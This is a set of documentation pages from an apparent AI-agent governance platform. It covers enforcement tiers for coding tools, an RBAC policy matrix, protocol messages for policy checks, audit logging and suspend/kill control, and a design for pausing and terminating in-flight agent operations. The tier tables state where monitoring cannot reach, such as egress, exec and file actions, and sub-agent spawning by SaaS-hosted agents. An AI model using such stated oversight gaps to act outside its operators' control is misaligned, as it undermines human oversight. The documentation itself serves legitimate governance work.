Network-egress block	L0	Remote execution; egress is controlled by the SaaS provider, not AAASM
Sub-agent governance	L0	SaaS multi-agent orchestration is opaque; AAASM cannot intercept spawn events

Honest boundaries for SaaS coding-agents:

SaaS-hosted tools execute remotely. AAASM’s enforcement capabilities (L2–L3) apply only to locally-running processes. This is a fundamental architectural limit, not a product gap.
L1 observability is available only if the user installs the observability adapter (browser extension or API hook). Without it, even L1 is not available.
In v0.0.1 these tools are out of scope for anything stronger than L1 observability.

Summary table

Tool	Audit	Policy Vis.	MCP Allowlist	Exec Block	File Block	Net Block	Sub-agent
Codex	L2	L2	L3	L3	L3	L2	L2
GitHub Copilot	L1	L1	L3	L0†	L0†	L1	L0
Windsurf Cascade	L1	L1	L3	L1†	L1†	L1	L1
Claude Code	TBD	TBD	TBD	TBD	TBD	TBD	TBD
SaaS Coding-Agent	L1	L1	L0	L0	L0	L0	L0

† These capabilities require aa-proxy (Layer 2) running alongside the tool for enforcement. Without the proxy, the declared tier drops to L0 (discovery/inventory only).

Relationship to the three interception layers

The dev-tool adapter tier system is separate from but complementary to AAASM’s three interception layers (SDK / proxy / eBPF). The layers provide runtime enforcement regardless of which tool is active; the adapter tiers describe what each specific tool’s native API exposes:

Layer	What it governs	Interaction with adapter tiers
Layer 1 — SDK shim (`aa-ffi-*`)	Agents that use the AAASM SDK explicitly	Provides L2 enforcement for SDK-aware tools independent of adapter tier
Layer 2 — `aa-proxy`	All outbound HTTPS from the machine	Provides L2 network/exec enforcement for any tool; fills gaps where adapter tier is L0 for exec/file/net
Layer 3 — `aa-ebpf` (Linux only)	SSL uprobes + exec/file syscalls at kernel level	Provides L1 detection + alerting for any tool; cannot modify traffic in flight (no redaction at this layer)

In practice, for tools where the adapter tier is L0 or L1 for exec/file/network enforcement, deploying aa-proxy alongside the tool upgrades effective enforcement to L2 for those dimensions without requiring a new adapter.
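The upgrade rule in the paragraph above can be sketched as a small function. This is a minimal illustration, not the project's code: the `Tier` enum and `effective_tier` function are hypothetical names, and the real `GovernanceLevel` enum (AAASM-199) may be shaped differently.

```rust
/// Hypothetical mirror of the L0 to L3 governance levels.
/// Variant order matters: the derived `Ord` makes L0 < L1 < L2 < L3.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum Tier {
    L0,
    L1,
    L2,
    L3,
}

/// Effective tier for an exec/file/network capability: the adapter's
/// declared tier, raised to at least L2 when aa-proxy runs alongside.
pub fn effective_tier(adapter_tier: Tier, proxy_deployed: bool) -> Tier {
    if proxy_deployed {
        adapter_tier.max(Tier::L2)
    } else {
        adapter_tier
    }
}
```

Under these assumptions, GitHub Copilot's terminal-exec capability (adapter tier L0) evaluates to L2 with the proxy deployed, while a capability already declared L3 is left unchanged.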

References

AAASM-199 — Agent Assembly SDK interception overview (DevToolAdapter trait + GovernanceLevel enum)
AAASM-201 — Claude Code adapter (pending; will update Claude Code row above)
AAASM-202 — Codex adapter
AAASM-203 — GitHub Copilot adapter
AAASM-204 — Windsurf Cascade adapter
AAASM-206 — Governance level (L0–L3) classification in policy schema (governance_level field in AgentRecord and policy conditions)
AAASM-918 — SaaS coding-agent adapter (pending; will finalize SaaS row above)
docs/src/architecture/system-architecture.md — Three-layer interception model
docs/src/policy-rbac.md — RBAC role matrix for policy mutations

Last updated: 2026-06-11 by Chisanan232

Policy RBAC Role Matrix

Auto-generated from the PolicyMutationRequiredRole table in aa-gateway/src/policy/rbac.rs. Do not edit by hand — run cargo run -p aa-api --bin generate_policy_rbac_doc to regenerate.

The 5 canonical RBAC roles in privilege order (highest → lowest): OrgAdmin > TeamAdmin > Developer > Viewer > Auditor.

Auditor may never mutate policies; all write attempts are denied.

Scope	create	update	delete
`global`	`org_admin`	`org_admin`	`org_admin`
`org`	`org_admin`	`org_admin`	`org_admin`
`team`	`team_admin`	`team_admin`	`team_admin`
`agent`	`developer`	`developer`	`developer`
`tool`	`developer`	`developer`	`developer`

Role Descriptions

org_admin — Full policy mutation rights across all scopes.
team_admin — Can mutate team-scoped policies and below (Agent, Tool).
developer — Can mutate agent- and tool-scoped policies only.
viewer — Read-only access — no writes permitted.
auditor — Read-only audit access — all write attempts denied regardless of scope.
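The matrix and role descriptions above can be read as a single check. The following is a minimal sketch under stated assumptions: `Role`, `Scope`, `required_role`, and `can_mutate` are illustrative names rather than the contents of `aa-gateway/src/policy/rbac.rs`, and the sketch assumes that a higher-privilege role satisfies a lower requirement, as the role descriptions suggest.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Role {
    OrgAdmin,
    TeamAdmin,
    Developer,
    Viewer,
    Auditor,
}

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Scope {
    Global,
    Org,
    Team,
    Agent,
    Tool,
}

/// Write privilege rank; `None` for the read-only roles.
fn write_rank(role: Role) -> Option<u8> {
    match role {
        Role::OrgAdmin => Some(3),
        Role::TeamAdmin => Some(2),
        Role::Developer => Some(1),
        Role::Viewer | Role::Auditor => None,
    }
}

/// Minimum role for create, update, or delete at `scope` (the matrix
/// lists the same role for all three verbs).
pub fn required_role(scope: Scope) -> Role {
    match scope {
        Scope::Global | Scope::Org => Role::OrgAdmin,
        Scope::Team => Role::TeamAdmin,
        Scope::Agent | Scope::Tool => Role::Developer,
    }
}

/// True when `role` may mutate a policy at `scope`.
pub fn can_mutate(role: Role, scope: Scope) -> bool {
    match (write_rank(role), write_rank(required_role(scope))) {
        (Some(have), Some(need)) => have >= need,
        _ => false, // Viewer and Auditor never write
    }
}
```

For example, `can_mutate(Role::TeamAdmin, Scope::Agent)` is true, while `can_mutate(Role::Developer, Scope::Team)` and any call with `Role::Auditor` are false.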

Last updated: 2026-05-08 by Chisanan232

Protocol Specification Changelog

Scope: This changelog covers the Agent Assembly protocol specification only — proto message schemas, JSON schema, IPC framing contract, and SDK protocol conformance requirements. For runtime/crate release notes, see the project CHANGELOG when it exists.

All notable changes to the protocol specification are documented here. Format follows Keep a Changelog. Protocol versioning follows the policy in docs/versioning.md.

[v0.0.1] — 2026-04-28

Initial release of the Agent Assembly protocol specification.

Added

Services

AgentLifecycleService (proto/agent.proto) — RPC surface for agent registration, heartbeat, deregistration, and runtime control stream
PolicyService (proto/policy.proto) — synchronous policy check RPC for intercepting agent actions before execution
AuditService (proto/audit.proto) — event reporting and streaming RPC for immutable audit log ingestion

Agent lifecycle messages (`proto/agent.proto`)

RegisterRequest — agent startup registration carrying identity, framework, tool list, risk tier, public key, and arbitrary metadata
RegisterResponse — gateway issues credential token, assigns policy, sets heartbeat interval
HeartbeatRequest — periodic liveness signal carrying active run count and cumulative action count
HeartbeatResponse — gateway signals policy update and/or suspend request to agent
DeregisterRequest — clean or forced agent shutdown with optional reason string
DeregisterResponse — gateway confirms deregistration success and echoes agent identity
ControlStreamRequest — opens persistent server-streaming channel for runtime control
ControlCommand — oneof wrapper dispatching to one of four command variants:
- SuspendCommand — instructs agent to pause execution
- ResumeCommand — instructs agent to resume execution
- PolicyUpdateCommand — delivers updated policy document inline
- KillCommand — instructs agent to terminate with optional reason

Policy messages (`proto/policy.proto`)

CheckActionRequest — policy check request carrying agent identity, credential token, trace/span IDs, action type, and action-specific context
CheckActionResponse — policy decision carrying Decision enum, reason, policy rule reference, optional approval ID, optional redact instructions, and decision latency
ActionContext — oneof wrapper for the five action context subtypes:
- LLMCallContext — model name, prompt token count, and sampled prompt prefix
- ToolCallContext — tool name, source (mcp/builtin), JSON args, and target URL
- FileOpContext — operation type, file path, and byte count
- NetworkCallContext — method, URL, and header names
- ProcessExecContext — executable path and argument list
RedactInstructions — container for one or more redaction rules
RedactRule — field path (JSONPath) and replacement string for a single redaction
BatchCheckRequest — wraps multiple CheckActionRequest items for bulk evaluation
BatchCheckResponse — wraps corresponding CheckActionResponse items

Event messages (`proto/event.proto`)

EnvelopedEvent — typed event envelope with agent identity, timestamp, sequence number, and oneof payload for the five event subtypes
AlertTriggered — credential or policy violation alert with severity and matched pattern
ApprovalRequested — human-in-the-loop approval request with timeout and context summary
AgentStatusChanged — agent lifecycle state transition notification
BudgetThresholdHit — token or cost budget threshold breach notification
ApprovalDecision — outcome of a previously requested approval

Audit messages (`proto/audit.proto`)

AuditEvent — immutable audit record with agent identity, timestamp, sequence number, SHA-256 hash chain field, and oneof payload for five detail subtypes:
- LLMCallDetail — model, token counts, finish reason
- ToolCallDetail — tool name, source, args hash, result hash
- FileOpDetail — operation, path, byte count, hash
- NetworkCallDetail — method, URL, status code, response byte count
- ProcessExecDetail — executable, args hash, exit code
PolicyViolation — policy rule reference, decision, and triggering action summary
ApprovalEvent — approval request and decision pair linked by approval ID
ReportEventsRequest / ReportEventsResponse — unary bulk event submission
StreamEventsResponse — server acknowledgement for the streaming submission RPC

Common types (`proto/common.proto`)

AgentId — composite agent identity: org_id, team_id, agent_id (DID string)
Timestamp — millisecond-precision Unix timestamp (unix_ms int64)
Decision enum — ALLOW, DENY, PENDING, REDACT
ActionType enum — LLM_CALL, TOOL_CALL, FILE_OPERATION, NETWORK_CALL, PROCESS_EXEC, AGENT_SPAWN
RiskTier enum — LOW, MEDIUM, HIGH, CRITICAL

JSON Schema

schemas/policy/v1/policy-document.schema.json — PolicyDocument JSON Schema v1, defining the structure of policy rules evaluated by PolicyService
Example policy documents: schemas/examples/strict.yaml, balanced.yaml, audit-only.yaml

IPC framing contract

Transport: Unix domain socket (/var/run/aa-runtime.sock by default)
Framing: prost varint length-delimited encoding — each frame is a varint-encoded byte length followed by the raw proto bytes
Reference: prost::Message::encode_length_delimited / prost::Message::decode_length_delimited
Conformance vectors: conformance/vectors/ipc_framing/ (10 vectors)
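To make the framing rule concrete, here is a hand-rolled sketch of varint length-delimited framing using only the standard library. It illustrates the wire layout that prost's length-delimited helpers produce; `encode_frame` and `decode_frame` are hypothetical names, and a real implementation would call prost rather than re-implement the varint.

```rust
/// Encode `payload` as one frame: varint byte length, then the raw bytes.
pub fn encode_frame(payload: &[u8]) -> Vec<u8> {
    let mut out = Vec::with_capacity(payload.len() + 10);
    let mut len = payload.len() as u64;
    // Base-128 varint: 7 bits per byte, least-significant group first,
    // high bit set on every byte except the last.
    while len >= 0x80 {
        out.push((len as u8 & 0x7f) | 0x80);
        len >>= 7;
    }
    out.push(len as u8);
    out.extend_from_slice(payload);
    out
}

/// Decode one frame from the front of `buf`.
/// Returns the payload and the total bytes consumed, or `None` when the
/// buffer does not yet hold a complete frame or the varint is malformed.
pub fn decode_frame(buf: &[u8]) -> Option<(&[u8], usize)> {
    let mut len: u64 = 0;
    // A u64 varint occupies at most 10 bytes.
    for (i, &byte) in buf.iter().enumerate().take(10) {
        len |= u64::from(byte & 0x7f) << (7 * i);
        if byte & 0x80 == 0 {
            let start = i + 1;
            let available = (buf.len() - start) as u64;
            if len > available {
                return None; // payload not fully received yet
            }
            let end = start + len as usize;
            return Some((&buf[start..end], end));
        }
    }
    None
}
```

A 300-byte message is prefixed with the two bytes `0xAC 0x02`. A reader on the socket can call `decode_frame` repeatedly, advancing by the returned byte count, and wait for more data whenever it returns `None`.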

Tagging runbook

Run the following commands only when AAASM-12 (Protocol Specification epic) is fully closed and all protocol tickets have been merged into master:

# Create annotated tag for the initial spec release
git tag -a spec/v0.0.1 -m "Protocol Specification v0.0.1 — initial release"

# Push the tag to the upstream remote
git push origin spec/v0.0.1

Tag namespace convention: spec/<version> — coexists with future runtime/<version>, sdk/<version> tags in the same monorepo without ambiguity.

Last updated: 2026-05-04 by Chisanan232

Migration Guide — [FILL IN: brief title, e.g. “`AgentId.agent_id` renamed to `AgentId.id`”]

Template instructions: Copy this file to docs/migration/<vX.Y-to-vZ.0>.md, fill in every [FILL IN] section, and delete these instruction lines. See the completed worked example in docs/versioning.md for a reference of what a finished guide looks like.

Breaking change introduced in: protocol/v[FILL IN]
Deprecated since: protocol/v[FILL IN] (omit if not previously deprecated)
Affected SDK versions: [FILL IN: e.g. “All SDKs using MessageName.field_name”]
Estimated migration effort: [FILL IN: Low / Medium / High]

Low: mechanical find-and-replace, no logic change.
Medium: logic changes in a small number of call sites.
High: widespread changes or dependent schema updates required.

What changed

[FILL IN: One or two paragraphs describing what was removed, renamed, or altered and why. Include the field number, message name, and proto file. Explain the motivation briefly — e.g. naming consistency, type safety, protocol simplification.]

Before (`protocol/v[FILL IN].x`)

Proto encoding:

[FILL IN: show the relevant message with the old field]
MessageName {
  field_name: "example-value"   // field N — old name/type
}

Python SDK:

[FILL IN: show the old API call]
obj = MessageName(field_name="example-value")

Node.js SDK:

[FILL IN: show the old API call]
const obj = new MessageName({ fieldName: 'example-value' });

Go SDK:

[FILL IN: show the old API call]
obj := &pb.MessageName{FieldName: "example-value"}

After (`protocol/v[FILL IN].0+`)

Proto encoding:

[FILL IN: show the relevant message with the new field]
MessageName {
  new_field_name: "example-value"   // field M — new name/type
}

Python SDK:

[FILL IN: show the new API call]
obj = MessageName(new_field_name="example-value")

Node.js SDK:

[FILL IN: show the new API call]
const obj = new MessageName({ newFieldName: 'example-value' });

Go SDK:

[FILL IN: show the new API call]
obj := &pb.MessageName{NewFieldName: "example-value"}

Migration steps

[FILL IN: First step — e.g. “Search your codebase for all usages of MessageName.field_name.”]
[FILL IN: Second step — e.g. “Replace each with MessageName.new_field_name.”]
[FILL IN: Third step — e.g. “Run the conformance test suite to verify.”]
[FILL IN: Deployment order step if relevant — e.g. “Deploy the updated SDK before upgrading aa-runtime past vN.x (runtime vN.x still supports protocol/v(N-1)).”]

Verification

Run the conformance suite against a runtime at protocol/v[FILL IN]:

[FILL IN: exact command, e.g.]
cargo test -p conformance
python conformance/runner/runner.py --verbose

Expected: all vectors pass with no failures referencing [FILL IN: old field name].

Event: `topology.cross_team_edge`

Published by aa-gateway whenever an edge is inserted between two agents that belong to different teams. Both agents must have a non-NULL team_id in the agent registry; if either is missing the event is suppressed and an info-level log line is emitted instead.

Transport

Internal Tokio broadcast channel (tokio::sync::broadcast::Sender<CrossTeamEdgeEvent>). Channel capacity: 64. Slow consumers receive RecvError::Lagged(n) when they fall behind.

Subscribers call InMemoryEdgeRepo::subscribe_cross_team_events().

Payload

Rust type: aa_gateway::edges::CrossTeamEdgeEvent

Field	Type	Description
`edge_id`	`i64`	Auto-assigned id of the inserted edge
`source_agent_id`	`AgentId` (`[u8; 16]`)	Agent that originated the relationship
`source_team_id`	`String`	Team the source agent belongs to
`target_agent_id`	`AgentId` (`[u8; 16]`)	Agent that was the target
`target_team_id`	`String`	Team the target agent belongs to
`edge_type`	`EdgeType`	Semantic type: one of `delegates_to`, `calls`, `reads`, `writes`, `approves`, `messages`
`occurred_at`	`DateTime<Utc>`	UTC timestamp when the edge was recorded

Example (JSON-serialised for illustration)

{
  "edge_id": 42,
  "source_agent_id": "01010101010101010101010101010101",
  "source_team_id": "team-alpha",
  "target_agent_id": "02020202020202020202020202020202",
  "target_team_id": "team-beta",
  "edge_type": "messages",
  "occurred_at": "2026-05-10T04:00:00Z"
}
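The agent ids in the example above are 16-byte values shown as 32 hex characters. A minimal sketch of that rendering follows; `agent_id_hex` is a hypothetical helper, and lowercase hex is an assumption, since the JSON form is given for illustration only.

```rust
/// Render a 16-byte agent id as a 32-character lowercase hex string.
pub fn agent_id_hex(id: &[u8; 16]) -> String {
    id.iter().map(|b| format!("{:02x}", b)).collect()
}
```

With this helper, an id whose bytes are all `0x01` renders as `01` repeated sixteen times, matching the `source_agent_id` in the example.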

Publishing conditions

Scenario	Action
`source.team_id != target.team_id` (both set)	Publish `CrossTeamEdgeEvent`
Either `team_id` is `NULL`	Log at `INFO`; no event
`source.team_id == target.team_id`	No event
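The publishing conditions in the table reduce to one match over the two optional team ids. This is a sketch only: `EdgeAction` and `cross_team_action` are illustrative names, not items from `aa_gateway::edges`.

```rust
#[derive(Debug, PartialEq, Eq)]
pub enum EdgeAction {
    Publish, // emit a CrossTeamEdgeEvent
    LogInfo, // a team_id is missing: log at INFO, no event
    Skip,    // same team: nothing to do
}

/// Decide what to do after inserting an edge between two agents.
pub fn cross_team_action(source_team: Option<&str>, target_team: Option<&str>) -> EdgeAction {
    match (source_team, target_team) {
        (Some(s), Some(t)) if s != t => EdgeAction::Publish,
        (Some(_), Some(_)) => EdgeAction::Skip,
        _ => EdgeAction::LogInfo,
    }
}
```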

Consumer notes (AAASM-198)

Subscribe before inserting edges: a broadcast receiver only sees events sent after it subscribes, so edges inserted earlier are never delivered to it.
The broadcast channel drops events for receivers that fall more than 64 messages behind — design consumers to process promptly or buffer independently.
edge_id can be used to fetch full edge metadata via GET /api/v1/agents/{id}/edges.

Last updated: 2026-05-10 by Chisanan232

In-Flight Ops Registry — Architecture

Status: Active design; PR-A landed (AAASM-1422).

Scope: Gateway-side tracking of agent operations from CheckActionRequest ingestion through to terminal Completing/Terminated states, the IPC protocol that lets the dashboard observe and control those operations, and the SDK return-channel that propagates control signals back to running agents.

1 — Why this exists

The original audit pipeline records what already happened (AuditEvent is post-facto and immutable). The Live Ops dashboard (AAASM-1326, AAASM-1334) needs a live view of operations currently in flight: which agents are running right now, which are paused, which were just terminated. None of that existed before AAASM-1525 / AAASM-1422.

AAASM-1415 shipped the POST /api/v1/ops/{id}/{pause,resume,terminate} route shells as stubs that return 202 + log so the dashboard’s row-action menu could be wired without 404-ing. AAASM-1525 added the OpsRegistry skeleton in aa-api with a 3-state machine (Running / Paused / Terminated) and a client-driven POST /api/v1/ops registration endpoint. AAASM-1422 closes the remaining gap: gateway-side ingestion from the policy-check path, a 5-state model that distinguishes pre-allow from post-completion, and a sub-task plan for the IPC protocol and SDK enforcement.

2 — Decisions recorded for this iteration

Decision	Choice	Why
Op identifier (AC #2 of AAASM-1422)	`op_id = "{trace_id}:{span_id}"`	Already in `CheckActionRequest`; distributed-tracing-native; lets the dashboard re-match same-id `OpStateChanged` WebSocket events without a new id allocator. No protobuf changes required for PR-A.
Crate home	`aa-gateway::ops`, re-exported via `aa_api::ops`	Mirrors `BudgetTracker`, `AgentRegistry`, `PolicyEngine`. `PolicyServiceImpl` (in `aa-gateway`) can ingest without a reverse-crate dep into `aa-api`.
State model	5 states: `Pending`, `Running`, `Paused`, `Completing`, `Terminated`	Distinguishes “policy allow not yet decided” (`Pending`) and “action finished, draining” (`Completing`) from the active middle states. Aligns with AAASM-1422 description.
Storage primitive	`DashMap<String, OpRecord>`	Lock-free concurrent reads, shard-level write locks. Identical to `BudgetTracker.per_agent`.
Ingestion entry point	`OpsRegistry::ingest(op_id) -> OpRecord` keyed by `{trace_id}:{span_id}`, idempotent	Called from `PolicyServiceImpl::check_action` before policy evaluation so the op appears in `Pending` state even if the policy decision takes time.
Allow transition	`OpsRegistry::allow(op_id)`: `Pending → Running`	Called from `PolicyServiceImpl::check_action` after an `Allow` decision.
Complete transition	`OpsRegistry::complete(op_id)`: `Running → Completing`	Drained-out terminal state; entries stay readable briefly so the dashboard can render the completion before they’re swept.
Sweep policy	Background tokio task on the registry drops `Completing` + `Terminated` entries older than 60 s. Tick every 10 s. Configurable via `spawn_sweep_task_with(registry, tick, ttl_seconds)`. (AAASM-1657 PR-H)	Bounds registry memory while giving the dashboard 60–70 s of grace (the 60 s TTL plus up to one 10 s tick) to render the terminal state before it disappears.
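Two of the decisions above, the op identifier format and the sweep rule, can be sketched with the standard library alone. This is an illustration under stated assumptions: it uses a plain `HashMap` and integer seconds instead of `DashMap` and RFC 3339 timestamps, and `Entry`, `op_id`, and `sweep` are hypothetical names rather than the registry's API.

```rust
use std::collections::HashMap;

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum OpState {
    Pending,
    Running,
    Paused,
    Completing,
    Terminated,
}

/// Stand-in record: the state plus the time of the last transition.
pub struct Entry {
    pub state: OpState,
    pub updated_at_secs: u64,
}

/// Build the op identifier from ids already present on the request.
pub fn op_id(trace_id: &str, span_id: &str) -> String {
    format!("{}:{}", trace_id, span_id)
}

/// One sweep tick: drop finished entries older than `ttl_secs`.
/// Returns how many entries were removed.
pub fn sweep(ops: &mut HashMap<String, Entry>, now_secs: u64, ttl_secs: u64) -> usize {
    let before = ops.len();
    ops.retain(|_, entry| {
        let finished = matches!(entry.state, OpState::Completing | OpState::Terminated);
        let age = now_secs.saturating_sub(entry.updated_at_secs);
        !(finished && age > ttl_secs)
    });
    before - ops.len()
}
```

Active entries (`Pending`, `Running`, `Paused`) are never swept in this sketch, however old they are; only the two finished states age out.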

3 — Data model

// aa-gateway/src/ops/mod.rs

pub enum OpState {
    Pending,     // ingested, awaiting policy decision
    Running,     // policy allowed; agent is actively executing
    Paused,      // operator paused via POST /api/v1/ops/{id}/pause
    Completing,  // action signalled complete, draining
    Terminated,  // operator terminated, or policy denied
}

pub struct OpRecord {
    pub op_id: String,         // "{trace_id}:{span_id}"
    pub state: OpState,
    pub registered_at: String, // RFC 3339; first time the op id was seen
    pub updated_at: String,    // RFC 3339; most recent transition
}

pub enum OpsError {
    NotFound,
    InvalidTransition,
}

pub struct OpsRegistry { /* DashMap<String, OpRecord> */ }

4 — State machine

stateDiagram-v2
    [*] --> Pending: ingest()
    Pending --> Running: allow()
    Pending --> Terminated: terminate() (policy Deny or operator)
    Running --> Paused: pause()
    Paused --> Running: resume()
    Running --> Completing: complete()
    Running --> Terminated: terminate()
    Paused --> Terminated: terminate()
    Completing --> [*]: (sweep — PR-H)
    Terminated --> [*]: (sweep — PR-H)

Transition rules:

From → To	Method	Notes
(none) → `Pending`	`ingest(op_id)`	Idempotent re-call returns the existing record unchanged.
`Pending` → `Running`	`allow(op_id)`	Called from policy-engine `Allow` path.
`Pending` → `Terminated`	`terminate(op_id)`	Policy `Deny` path may take this directly (PR-H).
`Running` → `Paused`	`pause(op_id)`	Operator action via HTTP.
`Paused` → `Running`	`resume(op_id)`	Operator action via HTTP.
`Running` → `Completing`	`complete(op_id)`	Called by SDK when the agent finishes the action (PR-E/F/G).
any non-terminal → `Terminated`	`terminate(op_id)`	Operator force-termination.
any other pair	(invalid)	Returns `OpsError::InvalidTransition`.

The registry remains idempotent on terminal states: calling terminate on an already-Terminated op returns the existing record without erroring.
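The transition rules above fit in one pure function. The sketch below is an illustration, not the registry's implementation: `Transition` and `next_state` are hypothetical names, and it assumes `Completing` counts as terminal, so `terminate` on a `Completing` op is rejected.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum OpState {
    Pending,
    Running,
    Paused,
    Completing,
    Terminated,
}

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Transition {
    Allow,
    Pause,
    Resume,
    Complete,
    Terminate,
}

#[derive(Debug, PartialEq, Eq)]
pub enum OpsError {
    InvalidTransition,
}

/// Apply one transition to a state, following the rules table.
pub fn next_state(from: OpState, transition: Transition) -> Result<OpState, OpsError> {
    use OpState::*;
    use Transition::*;
    match (from, transition) {
        (Pending, Allow) => Ok(Running),
        (Running, Pause) => Ok(Paused),
        (Paused, Resume) => Ok(Running),
        (Running, Complete) => Ok(Completing),
        // Any non-terminal state can be force-terminated.
        (Pending | Running | Paused, Terminate) => Ok(Terminated),
        // Idempotent: terminating a Terminated op is not an error.
        (Terminated, Terminate) => Ok(Terminated),
        _ => Err(OpsError::InvalidTransition),
    }
}
```

Keeping the rules in a pure function like this makes them easy to unit-test separately from the concurrent map that stores the records.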

5 — Ingestion path

agent ──gRPC──▶ PolicyServiceImpl::check_action(req)
                  │
                  ├─▶ ops_registry.ingest("{trace_id}:{span_id}")
                  │     // entry created in `Pending`
                  │
                  ├─▶ engine.evaluate(req)  ─▶  EvaluationResult
                  │
                  ├─▶ if Allow:
                  │      ops_registry.allow(op_id)   // Pending → Running
                  │   if Deny:
                  │      ops_registry.terminate(op_id) // Pending → Terminated  (PR-H)
                  │
                  └─▶ Response { decision, reason, ... }

This means: by the time the SDK receives the CheckActionResponse, the gateway-side registry has the op recorded and the dashboard sees it in the correct state via the WebSocket stream (PR-B).

PR-A ships the ingest() + allow() call sites. The terminate() on Deny is deferred to PR-H so PR-A keeps a small surface area.
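The PR-A call sequence can be sketched end to end with a toy registry. Everything here is a simplified stand-in: `Registry` wraps a `HashMap` rather than a `DashMap`, `check_action` takes a closure in place of the policy engine, and only the two states PR-A can reach are modelled.

```rust
use std::collections::HashMap;

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum OpState {
    Pending,
    Running,
}

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Decision {
    Allow,
    Deny,
}

#[derive(Default)]
pub struct Registry {
    ops: HashMap<String, OpState>,
}

impl Registry {
    /// Idempotent: a repeated ingest returns the existing state unchanged.
    pub fn ingest(&mut self, op_id: &str) -> OpState {
        *self.ops.entry(op_id.to_string()).or_insert(OpState::Pending)
    }

    /// Pending -> Running; any other state is left as it is.
    pub fn allow(&mut self, op_id: &str) {
        if let Some(state) = self.ops.get_mut(op_id) {
            if *state == OpState::Pending {
                *state = OpState::Running;
            }
        }
    }

    pub fn state(&self, op_id: &str) -> Option<OpState> {
        self.ops.get(op_id).copied()
    }
}

/// Ingest before evaluation, then apply the Allow transition.
pub fn check_action(
    registry: &mut Registry,
    trace_id: &str,
    span_id: &str,
    evaluate: impl Fn() -> Decision,
) -> Decision {
    let op_id = format!("{}:{}", trace_id, span_id);
    registry.ingest(&op_id); // visible as Pending while the policy runs
    let decision = evaluate();
    if decision == Decision::Allow {
        registry.allow(&op_id);
    }
    // On Deny the op stays Pending here, mirroring PR-A; the
    // Pending -> Terminated step is the part deferred to PR-H.
    decision
}
```

Because ingestion happens before evaluation, a slow policy decision still shows up in the registry as a `Pending` op rather than as nothing at all.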

6 — IPC sketch (PR-D)

Today the gateway → SDK channel is request/response only (CheckActionRequest → CheckActionResponse). For real pause / terminate enforcement, the SDK must learn about state changes while the action is in flight.

Two viable shapes:

Server-streaming OpControlStream — SDK opens a long-lived stream on register_agent. Gateway pushes {op_id, signal: pause|resume|terminate} messages. SDK acknowledges via a separate unary RPC. (Recommended in PR-D.)
Bidirectional OperationChannel — replace per-action CheckAction with a single bidi stream. Heavier protocol churn; deferred.

The SDK then cooperatively yields on pause, resumes on resume, and fast-fails on terminate. Each SDK (Python / Node / Go) ships its own enforcement layer in PR-E / PR-F / PR-G.

7 — Dashboard correlation (PR-C)

Today the dashboard’s useLiveOpsStream hook builds an in-memory map keyed by GovernanceEvent.id (monotonic, unique per event). Two events for the same op therefore can’t be correlated — the override-clear logic in LiveOpsPage never sees its target id again.

After PR-B/PR-C, the WebSocket emits a new OpStateChanged payload variant:

{
  "event_type": "ops_change",
  "agent_id": "agent-7",
  "payload": {
    "op_id": "trace-abc:span-1",   // stable across the op's lifetime
    "state": "running",            // OpState serialized snake_case
    "updated_at": "2026-05-20T09:32:20.822Z"
  }
}

The dashboard then keys its map by payload.op_id. The override-clear logic matches on the same key, so a pause followed by the server’s confirming paused event auto-clears the optimistic state without manual intervention.
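The correlation idea can be shown independently of the dashboard's TypeScript code. The sketch below is written in Rust only to stay consistent with the gateway examples; `LiveOps` and its fields are hypothetical and do not mirror the real `useLiveOpsStream` hook.

```rust
use std::collections::HashMap;

/// The fields of the `OpStateChanged` payload that matter for correlation.
pub struct OpStateChanged {
    pub op_id: String,
    pub state: String,
}

#[derive(Default)]
pub struct LiveOps {
    /// op_id -> last state confirmed by the server
    pub confirmed: HashMap<String, String>,
    /// op_id -> state the UI assumed after an operator click
    pub optimistic: HashMap<String, String>,
}

impl LiveOps {
    /// Fold one event into the view. Keying by `op_id` means later events
    /// for the same op update its row instead of adding a new one.
    pub fn on_event(&mut self, event: &OpStateChanged) {
        // Clear the optimistic override once the server confirms it.
        if self.optimistic.get(&event.op_id) == Some(&event.state) {
            self.optimistic.remove(&event.op_id);
        }
        self.confirmed
            .insert(event.op_id.clone(), event.state.clone());
    }
}
```

With a map keyed by a per-event id, the confirming `paused` event would land under a fresh key and the override would never clear; keying by `op_id` is what makes the match possible.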

8 — Sub-task plan

Sub-task	Scope	Touches
PR-B	`aa-proto` + `aa-api` `OpStateChanged` event type & payload schema	`proto/`, `aa-api/src/models/`, OpenAPI
PR-C	Dashboard id-model rework — `useLiveOpsStream` correlates by `op_id`, override auto-clear	`dashboard/src/`
PR-D	Gateway → SDK server-streaming return-channel: proto `OpControlStream` + `aa-proto` regen	`proto/`, SDK shims
PR-E	`python-sdk` cooperative pause + fast-fail terminate at shim layer	`python-sdk` repo
PR-F	`node-sdk` equivalent	`node-sdk` repo
PR-G	`go-sdk` equivalent	`go-sdk` repo
PR-H	Replace AAASM-1415 stub handlers with registry-backed transitions; emit `OpStateChanged` on each transition; add `Pending → Terminated` on policy Deny; add sweep policy	`aa-api/src/routes/ops.rs`, `aa-gateway/src/service/policy_service.rs`

9 — Out of scope for this Task (AAASM-1422)

Persistence across gateway restarts (the registry is in-memory; a restart empties it and the dashboard reconciles via the existing WS reconnect).
Multi-gateway cluster coordination (sharded by agent_id-affinity in a later release; not on the roadmap for v0.0.1).
Cross-team aggregation views beyond what the existing Live Ops page surfaces.

10 — References

AAASM-1422 — this Task
AAASM-1415 — stub /ops/{id}/{pause,resume,terminate} endpoints
AAASM-1525 — OpsRegistry skeleton with 3-state machine
AAASM-1326 / AAASM-1334 — Live Ops dashboard design + row actions

Last updated: 2026-05-21 by Chisanan232

Sandbox / Dry-Run Mode

Run any policy in observe-only mode for a few days before flipping the switch to live enforcement.

Sandbox mode is the governance analogue of a database transaction ROLLBACK: the gateway evaluates every rule, records every would-be decision in the audit log, and applies none of them. The agent proceeds as if no policy were in effect. Once you’ve reviewed the would-be violations and tuned the policy, you cut over to live enforce mode with a one-line change.

The feature is part of the open-source core — not an enterprise add-on.

How it works

Sandbox mode is an enforcement posture, not a separate runtime. It only changes what the gateway does after a policy decision is computed:

Decision	Enforce mode (default)	Observe / dry-run mode
`Allow`	Action proceeds	Action proceeds (identical)
